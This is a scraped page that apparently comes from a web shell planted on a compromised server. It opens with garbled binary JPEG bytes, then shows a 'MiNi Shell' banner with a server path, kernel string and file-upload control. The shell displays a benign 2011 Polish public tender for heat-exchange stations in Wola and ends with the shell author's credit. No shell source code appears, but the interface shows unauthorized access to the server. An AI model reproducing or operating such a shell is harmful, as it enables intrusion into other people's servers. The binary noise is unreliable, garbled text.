JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110601/153475-N-2011.html

<p class="kh_header"><b>Brzeszcze: Prefabrykacja, dostawa i montaż dwufunkcyjnych węzłów ciepła do realizacji przedsięwzięcia pn. budowa indywidualnego węzła cieplnego w budynku przy ul. Górniczej 18, 19, 20, 21, 22, 23, 24, 25, 27 w Woli</b><br>
<b>Numer ogłoszenia: 153475 - 2011; data zamieszczenia: 01.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadwiślańska Spółka Energetyczna sp. z o.o. , ul. A. Mickiewicza 2, 32-620 Brzeszcze, woj. małopolskie, tel. 032 7373100 do 105, faks 032 7373105.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.nse.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: sp. z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prefabrykacja, dostawa i montaż dwufunkcyjnych węzłów ciepła do realizacji przedsięwzięcia pn. budowa indywidualnego węzła cieplnego w budynku przy ul. Górniczej 18, 19, 20, 21, 22, 23, 24, 25, 27 w Woli.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest prefabrykacja, dostawa i montaż dwufunkcyjnych węzłów ciepła do realizacji przedsięwzięcia pn. budowa indywidualnego węzła cieplnego w budynku przy ul. Górniczej 18, 19, 20, 21, 22, 23, 24, 25 i 27 w Woli. Do udzielenia zamówienia przepisów ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 - tekst jednolity), zwanej dalej (ustawą Pzp) lub (Pzp), na podstawie art. 132 ust. 1 pkt 3 i w związku z art. 133 ust. 1 cyt. ustawy, nie stosuje się (zamówienia sektorowe podprogowe). Umowę zawiera się z Wykonawcą wyłonionym w trybie przetargu nieograniczonego na podstawie (Regulaminu Udzielania Zamówień) obowiązującego u Zamawiającego i SIWZ do PNP 27-2011. I. Przedmiot zamówienia obejmuje: 1. Prefabrykację i montaż 9 szt. kompaktowych dwufunkcyjnych węzłów cieplnych  według projektów technicznych Węzły cieplne dwufunkcyjne c.o. i c.w.u. dla budynków mieszkalnych przy ul. Górniczej w Woli (projekt budowy węzła nr T-445-C1-E1 do T-445-C9-E9); 2. Dostawę węzłów cieplnych do pomieszczeń znajdujących się w budynkach przy ul. Górniczej 18, 19, 20, 21, 22, 23, 24, 25, 27 w Woli; 3. Montaż węzłów cieplnych wraz z przyłączami zimnej wody ,wewnętrznej instalacji centralnego ogrzewania (co) i ciepłej wody użytkowej (cwu) oraz sieci grzewczej wysokiego parametru, w pomieszczeniach znajdujących się w budynkach przy ul. Górniczej 18, 19, 20, 21,22, 23, 24, 25, 27 w Woli; 4. Roboty elektryczne związane z podłączeniem urządzeń węzła cieplnego do szafy sterowniczej oraz wykonanie pomiarów elektrycznych; 5. Wykonanie prób i uruchomienie każdego węzła (9 szt.); 6. Wykonanie dla każdego węzła oznaczeń na armaturze i urządzeniach; 7.	 Wykonanie dla każdego węza schematu części technologicznej i elektrycznej  oraz opracowanie instrukcji obsługi węzła; 8. Przeszkolenie pracowników Zamawiającego w zakresie obsługi węzłów. Załącznik - do rzeczowego zakresu zamówienia: a. schemat rozmieszczenia węzłów ciepła (załącznik nr 2 do SIWZ); b. zestawienie mocy węzłów ciepła (załącznik nr 3 do SIWZ); c. wymagania stawiane armaturze i urządzeniom  zgodnie z projektem technicznym węzłów ciepła (załącznik nr 4 do SIWZ); d. zestawienie danych technicznych opisujących parametry pracy węzła (załącznik nr 5 do SIWZ). II. Wykaz wymaganych dokumentów, jakie musi dołączyć Wykonawca w ramach wykonania przedmiotu zamówienia: a. dokumentacje powykonawcze węzłów cieplnych (część technologiczna, elektryczna i akp) wraz ze schematami dla każdego węzła - 3 egzemplarze; b. deklaracje zgodności z normą i świadectwa jakości dla dostarczonych materiałów i urządzeń, polskie aprobaty techniczne dopuszczające do stosowania w budownictwie, atesty PZH; c.	 dopuszczenia UDT dla zabudowanych urządzeń (przygotowanie dokumentów do zgłoszenia i uzyskania pozytywnego odbioru przez UDT wszystkich urządzeń ciśnieniowych węzła podlegających takiemu odbiorowi - dozór pełny i ograniczony; d. protokoły z prób i pomiarów, instalacji elektrycznej węzła, ochrony przeciwporażeniowej i izolacji kabli; e. instrukcje obsługi węzłów i jego elementów (DTR); f. uproszczone schematy węzłów cieplnych - po jednym egzemplarzu dla każdego węzła w formacie A2; g. wykaz elementów każdego węzła cieplnego podlegających odbiorowi Dozoru Technicznego. III. Istotne postanowienia umowy: 1. Wymagana gwarancja: a. minimum 24 miesiące gwarancji na dostarczone materiały i urządzenia; b. minimum 24 miesiące gwarancji na wykonane prace montażowe. 2. Czas reakcji Wykonawcy na powiadomienie reklamacyjne o uszkodzeniu przedmiotu umowy objętego gwarancją: a. 24 godziny od daty powiadomienia Wykonawcy o awarii. 3. Wymagany, maksymalny czas na wykonanie naprawy gwarancyjnej: a. 48 godzin od momentu powiadomienia o awarii w czasie sezonu grzewczego; b. 4 dni od momentu powiadomienia o awarii poza sezonem grzewczym. 5. Warunki odbioru dotyczące przedmiotu umowy: a. dostarczenie dokumentów, o których mowa w ust. 3 lit. a. ÷ g specyfikacji; b. dostawa dwufunkcyjnych węzłów cieplnych (9 szt.) wykonanych zgodnie z dokumentacją; c. montaż dwufunkcyjnych węzłów ciepła (9 szt.); d. dokonanie rozruchu węzłów; e. spisanie protokołu częściowego odbioru przedmiotu umowy - dostawa, zabudowa oraz włączenie do sieci węzłów cieplnych (9 szt.); f. spisanie protokołu końcowego odbioru przedmiotu umowy - uruchomienie i regulacja węzłów cieplnych (9 szt.). 6. Wymagany czas w jakim należy poinformować Zamawiającego o planowanym czasie dostawy  (wykonania) przedmiotu umowy: a. powiadomienie pisemne na 3 dni przed dostawą i odbiorem przedmiotu umowy. 7. Sposób zapłaty: Ustala się dokonanie zapłaty za wykonanie przedmiotu zamówienia w dwóch ratach tj.: a. pierwsza rata: po wykonaniu dostawy, montażu (zabudowy) i włączeniu do sieci 9 szt. dwufunkcyjnych węzłów cieplnych (do dn. 05.09.2011r.) na podstawie podpisanego obustronnie protokołu odbioru częściowego - 80% wartości umowy, płatnych przelewem z 30 dniowym terminem płatności; b. druga rata: po uruchomieniu i wykonaniu regulacji 9 szt. dwufunkcyjnych węzłów cieplnych (po rozpoczęciu sezonu grzewczego) na podstawie podpisanego obustronnie protokołu odbioru końcowego - 20% wartości umowy, płatnych przelewem z 30 dniowym terminem płatności. Sposób dokonania zapłaty za wykonanie przedmiotu zamówienia, szczegółowo opisano we wzorze umowy (załącznik nr 7 do niniejszej specyfikacji). IV. Szczegółowy zakres umowy określa załącznik nr 7 do niniejszej specyfikacji. V. Zamawiający wymaga od Wykonawcy - przed złożeniem oferty, dokonania wizji lokalnej w miejscu realizacji przedmiotu zamówienia i zapoznania się z dokumentacją (projektami) będącą w posiadaniu Zamawiającego - po wcześniejszym uzgodnieniu telefonicznym z p. Janem Górnik, tel. (32) 7373100 do 103 w. 46, kom. 607 310 840. Zamawiający udostępni Wykonawcy posiadaną dokumentację (projekty) do wglądu w siedzibie Spółki, tj. 32-620 Brzeszcze, ul. A. Mickiewicza 2 w Dziale Zaopatrzenia i Remontów, pok. 227 (drugie piętro) - po wcześniejszym uzgodnieniu telefonicznym. Na potwierdzenie wymogu, o którym mowa powyżej (ust. 6 i 6.1), potencjalny Wykonawca musi uzyskać zaświadczenie od osób uprawnionych z ramienia Zamawiającego do kontaktów z Wykonawcą. Zaświadczenie to należy dołączyć do oferty - wzór zaświadczenia stanowi załącznik nr 10 do SIWZ. VI. TERMIN I MIEJSCE WYKONANIA ZAMÓWIENIA/DOSTAWY: 1. Wymagany termin wykonania przedmiotu zamówienia: a. dostawa, montaż (zabudowa) i włączenie do sieci 9 szt. dwufunkcyjnych węzłów cieplnych do dnia 05.09.2011r.; b. uruchomienie i wykonanie regulacji 9 szt. dwufunkcyjnych węzłów cieplnych nie później niż na 5 dzień po rozpoczęciu sezonu grzewczego. O rozpoczęciu sezonu grzewczego Zamawiający powiadomi Wykonawcę faksem. 2. Miejsce wykonania przedmiotu zamówienia: a. pomieszczenia piwniczne w budynkach przy ul. Górniczej 18, 19, 20, 21, 22, 23, 24, 25 i 27 w Woli.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.21.40-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu określonych 
w art. 22 ust. 1 pkt 1 ustawy Pzp (zał. nr 8 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 pkt 2 ustawy Pzp (zał. nr 8 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 pkt 3 ustawy Pzp (zał. nr 8 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 pkt 3 ustawy Pzp (zał. nr 8 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 pkt 4 ustawy Pzp (zał. nr 8 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokument, określający zasady reprezentacji oraz osoby uprawnione do reprezentacji Wykonawcy, a jeżeli Wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo, określające zakres umocowania, podpisane przez osoby uprawnione do reprezentowania Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.nse.com.pl, http://www.biznes-polska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadwiślańska Spółka Energetyczna sp.z o.o. w Brzeszczach ul. A. Mickiewicza 2 - Sekcja Zamówień Publicznych, II piętro, pokój 209.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2011 godzina 10:30, miejsce: Nadwiślańska Spółka Energetyczna sp. z o.o. w Brzeszczach, ul. A.Mickiewicza 2 - biuro podawcze (sekretariat) pok. nr 215.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com